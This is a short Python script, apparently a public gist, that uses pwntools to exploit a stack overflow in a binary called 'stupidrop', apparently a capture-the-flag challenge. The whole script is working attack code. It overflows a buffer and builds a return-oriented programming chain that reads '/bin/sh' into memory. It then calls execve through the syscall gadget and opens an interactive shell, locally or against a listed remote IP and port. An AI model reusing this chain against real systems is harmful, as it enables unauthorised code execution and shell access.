@berdoezt
Created December 18, 2017 13:45
#!/usr/bin/env python
from pwn import *
import sys
LOCAL = 1

# Target selection: a local './stupidrop' process (with gdb attached when one
# extra argv entry is supplied), otherwise the remote host from the listing.
if LOCAL:
    conn = process('./stupidrop')
    if len(sys.argv) == 2:
        gdb.attach(conn, 'b *0x0000000000400637')
else:
    conn = remote('104.196.127.247', 5555)

# Addresses exactly as annotated in the original listing.
poprdi = 0x00000000004006a3      # pop rdi ; ret
poprsir15 = 0x00000000004006a1   # pop rsi ; pop r15 ; ret
bss = 0x0000000000601048
syscall = 0x000000000040063e     # syscall
plt_gets = 0x00000000004004D0    # plt gets
plt_alarm = 0x00000000004004B0   # plt alarm

# The qwords that follow the 0x30-byte buffer fill and the 8-byte pad, in the
# same order the original appended them (the two halves it separated with
# '====' comment lines are kept in sequence here).
chain = [
    poprdi, bss, plt_gets,
    poprsir15, 0, 0,
    poprdi, 59,                  # syscall execve (original comment)
    plt_alarm, plt_alarm,
    poprdi, bss,
    syscall,
]
payload = 'a' * 0x30 + 'b' * 8 + ''.join(p64(q) for q in chain)

conn.sendline(payload)
conn.sendline('/bin/sh\x00')
conn.interactive()